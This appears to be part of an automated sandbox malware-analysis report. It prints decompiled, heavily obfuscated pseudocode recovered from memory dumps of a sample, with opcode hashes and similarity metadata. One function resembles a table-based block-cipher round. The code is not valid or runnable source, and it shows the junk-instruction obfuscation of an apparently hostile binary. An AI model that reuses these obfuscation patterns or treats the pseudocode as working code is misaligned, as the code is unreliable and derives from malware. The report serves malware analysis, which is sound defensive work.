                  																			_pop(__ebp);
                  																			asm("adc dl, [0x577e15d7]");
                  																			asm("adc edx, [0x2537897]");
                  																			if(__ah != 0) {
                  																				goto L1;
                  																			} else {
                  																				asm("sbb [0xdba81f75], esi");
                  																				__esi =  *0x47ecfb6a * 0x916c;
                  																				__edi = __edi & 0x59cc788d;
                  																				__edi = __edi +  *0xda2719be;
                  																				__edi = __edi + 0x66173bc2;
                  																				__esi = 0xa75cc1dd;
                  																				asm("adc esi, 0x404aa295");
                  																				asm("sbb edi, [0x764869f4]");
                  																				__ebx = __ebx | 0x9458832d;
                  																				_push(0xa75cc1dd);
                  																				__ebx = __ebx &  *0xeb0d2093;
                  																				__ecx = 0xc4ba9eef &  *0x573e2ddc;
                  																				__ebx = __ebx |  *0x8863fb98;
                  																				 *0xd7a55d9b =  *0xd7a55d9b & 0xa75cc1dd;
                  																				__eflags = 0x6848b7d3 - 0xf6f84611;
                  																				__cl = 0x116;
                  																				__ebp = __ebp +  *0xa11fe5c4;
                  																				__cl = 0x116 ^  *0x5a0bfcca;
                  																				asm("sbb eax, [0xe8f570d]");
                  																				__esp =  *0x2a101927;
                  																				__eflags = __edx -  *0x5ef51411;
                  																				if(__edx >  *0x5ef51411) {
                  																					goto L1;
                  																				} else {
                  																					__ecx =  *0x8620b37f * 0xbde7;
                  																					asm("sbb eax, 0x5a307765");
                  																					 *0x830c7ac7 =  *0x830c7ac7 ^ 0xa5fd2725;
                  																					_pop(__eax);
                  																					__esi = 0xffffffffc7f01871;
                  																					 *0xab77b615 = 0x43de5d13;
                  																					__esi = 0xffffffffc7f01871 |  *0x5c0e9ad8;
                  																					__eflags = 0xa75cc1dd;
                  																					asm("sbb eax, [0x2e10dec1]");
                  																					asm("movsw");
                  																					asm("rcr dword [0x3307ba83], 0x40");
                  																					if(0xa75cc1dd > 0) {
                  																						goto L1;
                  																					} else {
                  																						_pop( *0x53b86477);
                  																						asm("sbb esi, 0xe4d19be");
                  																						__eflags =  *0x461a3e07 & 0xa75cc1dd;
                  																						_t41 = __esp;
                  																						__esp =  *0x571b1065;
                  																						 *0x571b1065 = _t41;
                  																						__eflags =  *0xb7b8da8a - __dh;
                  																						asm("rcl byte [0x23bc670a], 0x93");
                  																						__edi = __edi |  *0xcd8c72f3;
                  																						__ch = __ch |  *0x21206db1;
                  																						__esp =  *0x571b1065 ^  *0x5c5f170e;
                  																						 *0xae3a1618 =  *0xae3a1618 + __ch;
                  																						__eax = 0x7785b228 &  *0x3702d39f;
                  																						__cl = 0x3c;
                  																						asm("sbb [0x7b1ed3ef], edx");
                  																						asm("rcr dword [0x8d00daff], 0xfc");
                  																						__esi = __esi +  *0x660df6ed;
                  																						asm("rcr byte [0xa83654b5], 0x32");
                  																						__eflags = 0x6848b7d3 -  *0x6adf7a1b;
                  																						asm("adc eax, 0xd583a815");
                  																						 *0xd9a1a512 = __dl;
                  																						 *0x8288442c =  *0x8288442c ^ __dh;
                  																						__dh = __dh + 0xb2;
                  																						 *0x33e9d93f =  *0x33e9d93f - 0xa75cc1dd;
                  																						__eflags =  *0x33e9d93f;
                  																						if( *0x33e9d93f > 0) {
                  																							goto L1;
                  																						} else {
                  																							__ebx = __ebx ^  *0x53b86477;
                  																							__ecx = __ecx |  *0x397911be;
                  																							__eflags = __ecx;
                  																							_pop( *0xaff0cea);
                  																							if(__ecx <= 0) {
                  																								goto L1;
                  																							} else {
                  																								_pop( *0xe5c93576);
                  																								__edx = __edx |  *0xdeb1a31b;
                  																								 *0x1127f398 =  *0x1127f398 << 0x7a;
                  																								__eflags =  *0x1de89fc8 & __edi;
                  																								asm("sbb esi, [0xb1e65e37]");
                  																								__esp = __esp |  *0x3297a3a1;
                  																								asm("sbb al, 0x2");
                  																								__ebx = __ebx ^  *0x274c23cb;
                  																								__esp = __esp |  *0xe4f6715;
                  																								__edx = __edx - 1;
                  																								__ebx = __ebx & 0x9c913d01;
                  																								__eflags = 0xa5fd2725 -  *0xc35bfd;
                  																								asm("ror dword [0x17fffea9], 0x51");
                  																								__bh = __bh ^ 0x000000d2;
                  																								_pop(__edx);
                  																								__dh = __dh -  *0x15be5920;
                  																								__edi =  *0x977b2860 * 0x211;
                  																								__ecx =  *0x594cfc65;
                  																								asm("rcr dword [0xea7648be], 0x7a");
                  																								asm("adc al, [0x59320ae7]");
                  																								__esp = __esp -  *0x11be59fe;
                  																								__eflags = __esp;
                  																								asm("rol byte [0x922894c6], 0x82");
                  																								if(__esp > 0) {
                  																									goto L1;
                  																								} else {
                  																									__ecx = __ecx &  *0x4301ad77;
                  																									_t44 = __edi;
                  																									__edi =  *0x21d7e3bc;
                  																									 *0x21d7e3bc = _t44;
                  																									__edi =  *0x21d7e3bc +  *0x270b71f4;
                  																									asm("sbb esp, 0xc5ec1127");
                  																									 *0xcfae6a2b =  *0xcfae6a2b << 0xcb;
                  																									__eflags = 0xa5fd2725 -  *0xf6abaa23;
                  																									if(0xa5fd2725 <  *0xf6abaa23) {
                  																										goto L1;
                  																										do {
                  																											do {
                  																												do {
                  																													do {
                  																														goto L1;
                  																													} while ( *0xafc40dfd == 0);
                  																													 *0xebc88197 = 0xefaf7a74;
                  																													_t57 =  *0x47681ae5;
                  																													asm("sbb [0x9bf9180a], cl");
                  																													 *0x6e000829 =  *0x6e000829 & _t57;
                  																													_pop(_t72);
                  																													 *0xbcdb0205 =  *0xbcdb0205 << 0x54;
                  																													 *0x100d41d9 =  *0x100d41d9 << 0xb7;
                  																													_t47 = _t47 -  *0xcd788b2 ^  *0xa928b4de;
                  																													 *0x5059fccb =  *0x5059fccb >> 0xd2;
                  																													asm("scasb");
                  																													_t52 = _t52 - 0x00000001 & 0x3f13d796;
                  																													asm("rcr dword [0x58b262f7], 0xab");
                  																													asm("lodsb");
                  																													_t71 = _t72 +  *0x852a61ed;
                  																													_t60 = _t60 | 0x000000d2;
                  																													_pop( *0x21924e3e);
                  																													asm("adc cl, 0x10");
                  																													asm("rcl dword [0x4c35eeef], 0x3b");
                  																													 *0x77cee58d =  *0x77cee58d - _t63;
                  																													asm("ror dword [0x4461cb8e], 0x22");
                  																													asm("rcl byte [0xa98d480], 0xfc");
                  																													asm("rcr dword [0xc8d3bfd3], 0xf7");
                  																													 *0xb4c42b4 =  *0xb4c42b4 << 0x22;
                  																													_t68 = _t68 - 0x00000001 & 0xab098af3;
                  																												} while (_t68 > 0);
                  																												_t63 =  *0x8a97937f * 0x8912;
                  																											} while (_t63 >= 0);
                  																											 *0xe605fd79 =  *0xe605fd79 << 0x69;
                  																											asm("rcl byte [0xf0bcc80a], 0x6d");
                  																											_t47 = _t47 &  *0x4821fe6f;
                  																											_t60 =  *0x240a8aa2;
                  																											_t52 =  *0xb30f8f01;
                  																											_t63 =  *0xa3462f0d;
                  																											asm("adc cl, 0x8a");
                  																											asm("rol dword [0xeca4e60f], 0x9f");
                  																											 *0xaf93041a =  *0xaf93041a & _t47;
                  																											asm("adc edi, [0x39b85af3]");
                  																											asm("ror byte [0xe16eb810], 0x27");
                  																											 *0xf0083212 =  *0xf0083212 << 0x70;
                  																											_t68 = _t68 + 1 - 1;
                  																											L1();
                  																											 *0xb72b1fe8 =  *0xb72b1fe8 | _t63;
                  																										} while ( *0xb72b1fe8 <= 0);
                  																										asm("adc esi, [0x4eddc476]");
                  																										 *0xd02b2388 =  *0xd02b2388 << 0x13;
                  																										_push( *0xfc3d6009);
                  																										asm("adc edi, 0x8598a113");
                  																										 *0x71ad01e2 =  *0x71ad01e2 << 0x52;
                  																										asm("sbb [0xfd967721], ecx");
                  																										 *0xf6c0a2c7 =  *0xf6c0a2c7 + _t52;
                  																										asm("adc dl, 0xe3");
                  																										 *0x9454ca64 =  *0x9454ca64 | _t68;
                  																										L1();
                  																										 *0x942d2ce8 =  *0x942d2ce8 >> 0xd2;
                  																										asm("adc eax, [0xc90c34bd]");
                  																										asm("sbb edi, 0x5bfc46c2");
                  																										_push( *0x41029527);
                  																										asm("sbb edi, 0xfb350d8e");
                  																										 *0x4df446fe =  *0x4df446fe & _t68;
                  																										 *0xa9465ee0 =  *0xa9465ee0 - _t60;
                  																										_push(_t57 - 0x3414c9b);
                  																										asm("adc ah, [0x9931c2a8]");
                  																										_push(_t71 ^  *0xf415b894);
                  																										asm("rcl byte [0xa50173ca], 0xfb");
                  																										return  *0x6af824de & 0xa892a2c0 |  *0xf1aba502;
                  																									} else {
                  																										__esp = __esp -  *0x2f4e8872;
                  																										asm("rol dword [0x1527f3ee], 0x1d");
                  																										_push(0x7785b229);
                  																										__eflags = __ebp -  *0xff06ed1e;
                  																										 *0xe86f880d =  *0xe86f880d + __edx;
                  																										__edi = __edi +  *0xecfb760b;
                  																										__edi = __edi + 1;
                  																										asm("rcr dword [0x788d916c], 0xb3");
                  																										asm("adc eax, [0x11be59cc]");
                  																										__edi = __edi - 1;
                  																										__eflags = __esi -  *0x5253681f;
                  																										return __eax;
                  																									}
                  																								}
                  																							}
                  																						}
                  																					}
                  																				}
                  																			}
                  																		}
                  																	}
                  																}
                  															}
                  														}
                  													}
                  												}
                  											}
                  										}
                  									}
                  								}
                  							}
                  						}
                  					}
                  				}
                  			}












                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c18596104b0f5fa3086f2e993b1f960c5607d31709c2d074459f2c6cc4c82db2
                  • Instruction ID: fb696e1be614b31489d0e7590aa3d12761543927cef419c9401e84b348a38c44
                  • Opcode Fuzzy Hash: c18596104b0f5fa3086f2e993b1f960c5607d31709c2d074459f2c6cc4c82db2
                  • Instruction Fuzzy Hash: 70327332918791DFCB16DF38C88AA813FB5F796320B09434EC9A1976E1D7752529CF84
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E011446E7(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				void* _t273;
                  				signed int _t274;
                  				signed int _t282;
                  				signed int* _t358;
                  				signed int _t383;
                  				signed int* _t409;
                  				signed int _t429;
                  				signed int _t458;
                  				signed int _t478;
                  				signed int _t560;
                  				signed int _t603;
                  
                  				_t273 = __eax;
                  				asm("ror edi, 0x8");
                  				asm("rol edx, 0x8");
                  				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
                  				asm("ror ebx, 0x8");
                  				asm("rol edx, 0x8");
                  				_v20 = _t458;
                  				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
                  				asm("ror ebx, 0x8");
                  				asm("rol edx, 0x8");
                  				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
                  				asm("ror esi, 0x8");
                  				asm("rol edx, 0x8");
                  				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
                  				asm("ror edx, 0x10");
                  				asm("ror esi, 0x8");
                  				asm("rol esi, 0x8");
                  				_v24 = _t282;
                  				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
                  				asm("ror esi, 0x10");
                  				asm("ror ebx, 0x8");
                  				asm("rol ebx, 0x8");
                  				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
                  				asm("ror ebx, 0x8");
                  				asm("ror edi, 0x10");
                  				asm("rol edi, 0x8");
                  				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
                  				asm("ror edi, 0x10");
                  				asm("ror ebx, 0x8");
                  				asm("rol ebx, 0x8");
                  				_t409 =  &(__ecx[8]);
                  				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                  				_t478 = (_a4 >> 1) - 1;
                  				_a4 = _t478;
                  				if(_t478 != 0) {
                  					do {
                  						asm("ror edi, 0x10");
                  						asm("ror ebx, 0x8");
                  						asm("rol ebx, 0x8");
                  						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
                  						asm("ror edi, 0x10");
                  						asm("ror ebx, 0x8");
                  						asm("rol ebx, 0x8");
                  						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
                  						asm("ror ebx, 0x8");
                  						asm("ror edi, 0x10");
                  						asm("rol edi, 0x8");
                  						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
                  						asm("ror edi, 0x10");
                  						asm("ror edx, 0x8");
                  						asm("rol edx, 0x8");
                  						_v24 = _t383;
                  						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
                  						asm("ror edx, 0x10");
                  						asm("ror esi, 0x8");
                  						asm("rol esi, 0x8");
                  						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
                  						asm("ror esi, 0x10");
                  						asm("ror ebx, 0x8");
                  						asm("rol ebx, 0x8");
                  						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
                  						_v12 = _t560;
                  						asm("ror edi, 0x8");
                  						asm("ror ebx, 0x10");
                  						asm("rol ebx, 0x8");
                  						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
                  						asm("ror ebx, 0x10");
                  						asm("ror edi, 0x8");
                  						asm("rol edi, 0x8");
                  						_t409 =  &(_t409[8]);
                  						_t205 =  &_a4;
                  						 *_t205 = _a4 - 1;
                  						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                  					} while ( *_t205 != 0);
                  				}
                  				asm("ror ebx, 0x8");
                  				asm("rol edi, 0x8");
                  				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
                  				asm("ror ebx, 0x8");
                  				asm("rol edi, 0x8");
                  				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
                  				asm("ror ebx, 0x8");
                  				asm("rol edi, 0x8");
                  				_t358 = _a8;
                  				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
                  				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
                  				asm("ror ecx, 0x8");
                  				asm("rol edi, 0x8");
                  				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
                  				return _t274;
                  			}




















                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                  • Instruction ID: 5b24ed9ac3c7bb11b6771bda604417adfdfef5bf9539f202749650a47f621a66
                  • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                  • Instruction Fuzzy Hash: 36026E73E547164FE720DE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA39BA525A90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 56%
                  			E01161D39(signed int __eax, void* __ebx, void* __ecx, void* __edx, signed int __esi) {
                  				signed char _t22;
                  				signed int _t28;
                  				signed int _t34;
                  				signed char _t37;
                  				signed int _t40;
                  				signed int _t44;
                  				signed int _t47;
                  				void* _t48;
                  
                  				_t44 = __esi;
                  				asm("rcl dword [0x1527f3ee], 0xa3");
                  				_t22 = __eax ^ 0xa5b2e4f8 ^  *0xf7944e1;
                  				_t47 =  *0x330b8469 * 0x6477;
                  				_t28 = __ebx +  *0x19be53b8;
                  				 *0xa7bd34e4 =  *0xa7bd34e4 ^ _t22;
                  				_pop(_t37);
                  				if( *0xa7bd34e4 >= 0) {
                  					L1:
                  					asm("rol dword [0x229bb109], 0xeb");
                  					_t47 = _t47 + 1;
                  					asm("rol dword [0x124cdbfd], 0xe8");
                  					 *0xafc40dfd =  *0xafc40dfd << 0xef;
                  				} else {
                  					 *0xf2050f79 =  *0xf2050f79 ^ __edx;
                  					__esp = __esp ^ 0x15c2546c;
                  					__esi = 0x206db13d;
                  					 *0xd6333615 =  *0xd6333615 + 0x206db13d;
                  					__dl = __dl +  *0x6b34e9b7;
                  					__ebx = __ebx & 0xa3e6bf31;
                  					asm("sbb [0xf34444e3], ah");
                  					 *0x28ba962a =  *0x28ba962a >> 0xef;
                  					_pop(__ecx);
                  					_push( *0x24711be);
                  					asm("adc [0xb377dfa3], ebx");
                  					asm("rcl dword [0xe2bc6a1b], 0xc7");
                  					__ecx = __ecx -  *0x8a7f897;
                  					asm("ror byte [0x1527f3f2], 0x36");
                  					if(__bh <= 0) {
                  						goto L1;
                  					} else {
                  						__eax =  *0xcff09e7e * 0xba5b;
                  						asm("sbb al, 0xe5");
                  						__edx =  *0x1fc6b88e;
                  						asm("sbb eax, [0x59c55e07]");
                  						__ebp = __ebp ^  *0x42621be;
                  						__ecx = __ecx | 0xe8103b11;
                  						asm("sbb edx, [0x460ed737]");
                  						_push(__ebp);
                  						0x9673e403 +  *0xcff09e7e * 0xba5b = 0x9673e403 +  *0xcff09e7e * 0x0000ba5b |  *0xb58e85db;
                  						 *0xe2f250da =  *0xe2f250da >> 0xc6;
                  						 *0xcae923c1 =  *0xcae923c1 ^ __ebp;
                  						_t13 = __ebx;
                  						__ebx =  *0x2d156adf;
                  						 *0x2d156adf = _t13;
                  						__esp =  *0xe4f5b22b;
                  						 *0xeb6646e5 =  *0xeb6646e5 | __ah;
                  						__al = __al ^  *0xd932db18;
                  						__ecx = __ecx - 1;
                  						__eax =  *0x64773313;
                  						__esi =  *0xdbe53b8;
                  						 *0xdbe53b8 = 0x206db13d;
                  						_push(0x8a5668cb);
                  						__ebp = __ebp -  *0x8863fb98;
                  						 *0xd7a55d9b =  *0xd7a55d9b & __ebp;
                  						_push( *0xac558319);
                  						 *0x15da68d0 =  *0x15da68d0 >> 0xcc;
                  						 *0xb110eaca =  *0xb110eaca + __cl;
                  						asm("sbb esp, [0x604fced1]");
                  						__dh = __dh - 0xf2;
                  						_push(__ebp);
                  						asm("sbb edx, 0xcd8faaa9");
                  						 *0xd206db1 =  *0xd206db1 >> 0x7f;
                  						 *0x8058a7cd =  *0x8058a7cd << 0x1e;
                  						 *0x38d7a188 =  *0x38d7a188 >> 0xc4;
                  						_push(__ebp);
                  						__ebx =  *0xd75d53b8;
                  						 *0xd75d53b8 =  *0x2d156adf;
                  						__ebp = __ebp ^  *0x7ae81f19;
                  						asm("sbb edi, [0x7937c5b8]");
                  						 *0x41d1e5dd =  *0x41d1e5dd << 0x1e;
                  						asm("rcr byte [0x6aecd882], 0xee");
                  						_push( *0xd75d53b8);
                  						 *0xc2546c8a =  *0xc2546c8a ^ __cl;
                  						__esi = 0x6db13d15;
                  						__ch = __ch ^ 0x00000008;
                  						if(__al < 0) {
                  							goto L1;
                  							do {
                  								do {
                  									do {
                  										do {
                  											goto L1;
                  										} while ( *0xafc40dfd == 0);
                  										 *0xebc88197 = 0xefaf7a74;
                  										_t34 =  *0x47681ae5;
                  										asm("sbb [0x9bf9180a], cl");
                  										 *0x6e000829 =  *0x6e000829 & _t34;
                  										_pop(_t48);
                  										 *0xbcdb0205 =  *0xbcdb0205 << 0x54;
                  										 *0x100d41d9 =  *0x100d41d9 << 0xb7;
                  										_t22 = _t22 -  *0xcd788b2 ^  *0xa928b4de;
                  										 *0x5059fccb =  *0x5059fccb >> 0xd2;
                  										asm("scasb");
                  										_t28 = _t28 - 0x00000001 & 0x3f13d796;
                  										asm("rcr dword [0x58b262f7], 0xab");
                  										asm("lodsb");
                  										_t47 = _t48 +  *0x852a61ed;
                  										_t37 = _t37 | 0x000000d2;
                  										_pop( *0x21924e3e);
                  										asm("adc cl, 0x10");
                  										asm("rcl dword [0x4c35eeef], 0x3b");
                  										 *0x77cee58d =  *0x77cee58d - _t40;
                  										asm("ror dword [0x4461cb8e], 0x22");
                  										asm("rcl byte [0xa98d480], 0xfc");
                  										asm("rcr dword [0xc8d3bfd3], 0xf7");
                  										 *0xb4c42b4 =  *0xb4c42b4 << 0x22;
                  										_t44 = _t44 - 0x00000001 & 0xab098af3;
                  									} while (_t44 > 0);
                  									_t40 =  *0x8a97937f * 0x8912;
                  								} while (_t40 >= 0);
                  								 *0xe605fd79 =  *0xe605fd79 << 0x69;
                  								asm("rcl byte [0xf0bcc80a], 0x6d");
                  								_t22 = _t22 &  *0x4821fe6f;
                  								_t37 =  *0x240a8aa2;
                  								_t28 =  *0xb30f8f01;
                  								_t40 =  *0xa3462f0d;
                  								asm("adc cl, 0x8a");
                  								asm("rol dword [0xeca4e60f], 0x9f");
                  								 *0xaf93041a =  *0xaf93041a & _t22;
                  								asm("adc edi, [0x39b85af3]");
                  								asm("ror byte [0xe16eb810], 0x27");
                  								 *0xf0083212 =  *0xf0083212 << 0x70;
                  								_t44 = _t44 + 1 - 1;
                  								L1();
                  								 *0xb72b1fe8 =  *0xb72b1fe8 | _t40;
                  							} while ( *0xb72b1fe8 <= 0);
                  							asm("adc esi, [0x4eddc476]");
                  							 *0xd02b2388 =  *0xd02b2388 << 0x13;
                  							_push( *0xfc3d6009);
                  							asm("adc edi, 0x8598a113");
                  							 *0x71ad01e2 =  *0x71ad01e2 << 0x52;
                  							asm("sbb [0xfd967721], ecx");
                  							 *0xf6c0a2c7 =  *0xf6c0a2c7 + _t28;
                  							asm("adc dl, 0xe3");
                  							 *0x9454ca64 =  *0x9454ca64 | _t44;
                  							L1();
                  							 *0x942d2ce8 =  *0x942d2ce8 >> 0xd2;
                  							asm("adc eax, [0xc90c34bd]");
                  							asm("sbb edi, 0x5bfc46c2");
                  							_push( *0x41029527);
                  							asm("sbb edi, 0xfb350d8e");
                  							 *0x4df446fe =  *0x4df446fe & _t44;
                  							 *0xa9465ee0 =  *0xa9465ee0 - _t37;
                  							_push(_t34 - 0x3414c9b);
                  							asm("adc ah, [0x9931c2a8]");
                  							_push(_t47 ^  *0xf415b894);
                  							asm("rcl byte [0xa50173ca], 0xfb");
                  							return  *0x6af824de & 0xa892a2c0 |  *0xf1aba502;
                  						} else {
                  							 *0xafaca078 =  *0xafaca078 & __ebp;
                  							_pop(__ebx);
                  							__eax = __eax |  *0xbe53b864;
                  							_t18 = __ecx;
                  							__ecx =  *0x3f587f21;
                  							 *0x3f587f21 = _t18;
                  							__ebx = __ebx + 1;
                  							__esp =  *0x1e239060 * 0xa524;
                  							return __eax;
                  						}
                  					}
                  				}
                  			}












                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9a223b0828a6c5d96318e2a6225e6fdca3fcdc5435f2df56dd78a9df59862a16
